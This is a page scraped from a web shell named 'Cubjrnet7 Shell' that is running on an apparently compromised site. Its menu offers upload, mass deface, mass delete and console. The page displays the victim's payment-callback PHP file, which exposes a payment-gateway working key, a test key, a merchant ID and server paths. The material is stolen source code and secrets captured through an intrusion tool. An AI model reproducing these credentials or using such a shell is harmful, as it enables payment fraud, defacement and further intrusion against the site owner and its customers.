shell bypass 403

Cubjrnet7 Shell

: /home/eklavya/www/pdfs/ekl_13_10_2023/order/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : pp.php
<?php 
ob_start();
session_start();
include_once("connection.inc.php");
include_once("global.inc.php");
require_once("libfuncs.php3");
include_once("pp-functions.php");
include_once("Crypto.php");
//if(strlen(PEAR_PATH)>0)
//{
  //ini_set("include_path", "/home/eklavya/public_html/pear/PEAR");
  //require_once "Mail.php";
  //require_once "Mail/mime.php";
//}

    $WorkingKey = "FCA4316B177F4EA994C3F6C0BEFC53A2" ;
	//$WorkingKey = "F60F0C78DCE34C5DDDC6D4ACF3165DE9" ; //Working key Test Details
	$Merchant_Id = 11164;
	//echo "Post values: <pre>"; print_r($_POST); echo "</pre>";
	$encResponse=$_POST["encResp"];	
	//echo "Response: <pre>"; print_r($encResponse); echo "</pre>";
	$rcvdString=decrypt($encResponse,$WorkingKey);		
	$order_status="";
	//echo "Received string: <pre>"; print_r($rcvdString); echo "</pre>";
	$decryptValues=explode('&', $rcvdString);
	//echo "Decrypt values: <pre>"; print_r($decryptValues); echo "</pre>";
	$dataSize=sizeof($decryptValues);
	echo "<center>";
	
	//echo "<pre>"; print_r($dataSize); echo "</pre>";

	for($i = 0; $i < $dataSize; $i++) 
	{
	    //echo "Info: <pre>"; print_r($information); echo "</pre>";
		$information=explode('=',$decryptValues[$i]);
                if($i==3)	$order_status=$information[1];
                if($i==0)	$Order_Id=$information[1]; 
                if($i==1)	 $Merchant_Id=$information[1];
                if($i==10)	 $Amount=$information[1]; 
           }

//echo "Order status 1: ".$order_status;
//echo "<br> Amount: ".$Amount;
$flagDirect = orderExistFrom_CorP($Order_Id);

//	echo "<br>Order status 2: ".$order_status;
	//echo "<br>Order ID: ".$Order_Id;
	//echo "<br>Flag redirect: ".$flagDirect;
	//die();

	if($order_status==="Success")
	{
		afterPayment($Order_Id, 1, $Amount, '');
		if($flagDirect == '0')
		{
			$message = "<br>Thank you for shopping with us. <br />Your transaction is successful. We will be shipping your order to you soon.";
			sendConfirmationOfOrder($Order_Id);
			header('Location:thank-you.php?message='.urlencode($message));
			exit();
		}
		else if($flagDirect == '1')
		{
			global $chakmakURL;
			prepareToSwitch($Order_Id);
			$message = "Thank you for your subscription. Your transaction is successful.";
			header('Location:'.$chakmakURL.'thank-you.php?status=son&message='.urlencode($message));

			exit();
		}
		//Here you need to put in the routines for a successful 
		//transaction such as sending an email to customer,
		//setting database status, informing logistics etc etc
	}
	else if($order_status==="Aborted")
	{
		if($flagDirect == '0')
		{
			$message = "<br>Thank you for shopping with us.<br />We will keep you posted regarding the status of your order through e-mail";
			header('Location:thank-you.php?message='.urlencode($message));
			exit();
		}
		else if($flagDirect == '1')
		{

			global $chakmakURL;
                            
			prepareToSwitch($Order_Id);
                        
			$message = "<br>Thank you for shopping with us.<br />We will keep you posted regarding the status of your order through e-mail";
			header('Location:'.$chakmakURL.'thank-you.php?status=son&message='.urlencode($message));
			exit();
		}
		//Here you need to put in the routines/e-mail for a  "Batch Processing" order
		//This is only if payment for this transaction has been made by an American Express Card
		//since American Express authorisation status is available only after 5-6 hours by mail from ccavenue and at the "View Pending Orders"
	}
	else if($order_status==="Failure")
	{
		afterPayment($Order_Id, 2, $Amount, 'The transaction has been declined.');
		if($flagDirect == '0')
		{
			$message = '<br><span style="#ff0000;">The transaction has been declined. Try again!</span>';
			header('Location:thank-you.php?message='.urlencode($message));
			exit();
		}
		else if($flagDirect == '1')
		{
			global $chakmakURL;
			prepareToSwitch($Order_Id);
			$message = 'The transaction has been declined. Try again!';
			header('Location:'.$chakmakURL.'thank-you.php?status=e2&message='.urlencode($message));
			exit();
		}
		//Here you need to put in the routines for a failed
		//transaction such as sending an email to customer
		//setting database status etc etc
	}
	else
	{
		header('Location:exception.php');
		exit();
		
		/*if($flagDirect == '0')
		{
			$message = '<br><span style="#ff0000;">Security Error. Illegal access detected.</span>';
			afterPayment($Order_Id, 0, $Amount, 'Security Error. Illegal access detected.');
			header('Location:thank-you.php?message='.urlencode($message));
			exit();
		}
		else
		{
			global $chakmakURL;
			
			afterPayment($Order_Id, 2, $Amount, 'Security Error. Illegal access detected.');
			prepareToSwitch($Order_Id, '', '','','');
			$Order_Id = $_POST['Order_Id'];
			$message = 'Security Error. Illegal access detected id:.'.$Order_Id;
			header('Location:'.$chakmakURL.'thank-you.php?status=e1&message='.urlencode($message));
			exit();
		}
		*/
		//Here you need to simply ignore this and dont need
		//to perform any operation in this condition
	}
	
?>

© 2025 Cubjrnet7